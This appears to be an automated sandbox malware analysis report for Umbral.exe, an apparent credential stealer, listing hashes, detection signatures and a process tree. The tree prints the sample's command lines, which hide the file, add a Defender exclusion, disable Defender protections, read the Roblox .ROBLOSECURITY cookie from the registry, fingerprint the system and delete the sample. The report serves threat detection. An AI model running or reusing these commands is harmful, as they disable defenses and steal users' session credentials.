Analysis
max time kernel: 4s
max time network: 126s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 10-06-2024 05:05
Behavioral task: behavioral1
Sample: Umbral.exe
Resource: win7-20240221-en
General
Target: Umbral.exe
Size: 229KB
MD5: aaf99a08d4968f6c8b4dffea65e508b5
SHA1: 99d6d8d218dc7a07cb8dbf009ed474782babd4d9
SHA256: 30ac9d27fe86c00f827876cb245deedf7f8f4cbb16f4359fda4beb0cf8183d73
SHA512: 9bf219952fca4d62f85bf565804e03901ec9d2b77d59e8600f2276a867bd8e6b516f4ee68527b481f11ff4df6ed4da77a438de1c1f386f8eae54e7797a63e696
SSDEEP: 6144:9loZM9rIkd8g+EtXHkv/iD4DcSP4+ZRSe3q459cgYb8e1mDi:foZOL+EP8DcSP4+ZRSe3q459clF
Malware Config
Signatures
- Detect Umbral payload (1 IoC)
  resource: behavioral1/memory/1032-1-0x00000000010A0000-0x00000000010E0000-memory.dmp
  yara_rule: family_umbral
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid 1692, process powershell.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 8: discord.com
  flow 9: discord.com
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 6: ip-api.com
- Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine videocard installed.
  pid 1276, process wmic.exe
- Runs ping.exe (1 TTP, 1 IoC)
  pid 1936, process PING.EXE
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 1692, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 1032, process Umbral.exe
  Token: SeDebugPrivilege, pid 1692, process powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  PID 1032 wrote to memory of 2220 (Umbral.exe, procid_target 28)
  PID 1032 wrote to memory of 2220 (Umbral.exe, procid_target 28)
  PID 1032 wrote to memory of 2220 (Umbral.exe, procid_target 28)
  PID 1032 wrote to memory of 1692 (Umbral.exe, procid_target 30)
  PID 1032 wrote to memory of 1692 (Umbral.exe, procid_target 30)
  PID 1032 wrote to memory of 1692 (Umbral.exe, procid_target 30)
  PID 1032 wrote to memory of 2564 (Umbral.exe, procid_target 32)
  PID 1032 wrote to memory of 2564 (Umbral.exe, procid_target 32)
  PID 1032 wrote to memory of 2564 (Umbral.exe, procid_target 32)
- Views/modifies file attributes (1 TTP, 1 IoC)
  pid 2220, process attrib.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  PID: 1032
  signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\attrib.exe
    command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    PID: 2220
    signatures: Views/modifies file attributes
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    PID: 1692
    signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    PID: 2564
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    PID: 2452
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    PID: 2944
  - C:\Windows\System32\Wbem\wmic.exe
    command line: "wmic.exe" os get Caption
    PID: 2740
  - C:\Windows\System32\Wbem\wmic.exe
    command line: "wmic.exe" computersystem get totalphysicalmemory
    PID: 2488
  - C:\Windows\System32\Wbem\wmic.exe
    command line: "wmic.exe" csproduct get uuid
    PID: 1860
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    PID: 2788
  - C:\Windows\System32\Wbem\wmic.exe
    command line: "wmic" path win32_VideoController get name
    PID: 1276
    signatures: Detects videocard installed
  - C:\Windows\system32\cmd.exe
    command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    PID: 2308
    - C:\Windows\system32\PING.EXE
      command line: ping localhost
      PID: 1936
      signatures: Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6K9AP69OMK9RJC8BDMK8.temp
  Filesize: 7KB
  MD5: d5ae352ab2f6a0c05cd31910f10c1a89
  SHA1: c0a935c5bb433a3d33a78ff3c36c15c763659930
  SHA256: 4d204bcb7e458b9490fbe4e7028a948363350a8740f4286f1423d65c6082c796
  SHA512: 301a02bad56d451213aa5114c11fdfd821d1f0c47e7a331c5529615c9ae7a68860ec8a7c05cbacc6257e50d91197620b4f4e2dbec1fc77d7d9f7e47e14f55e58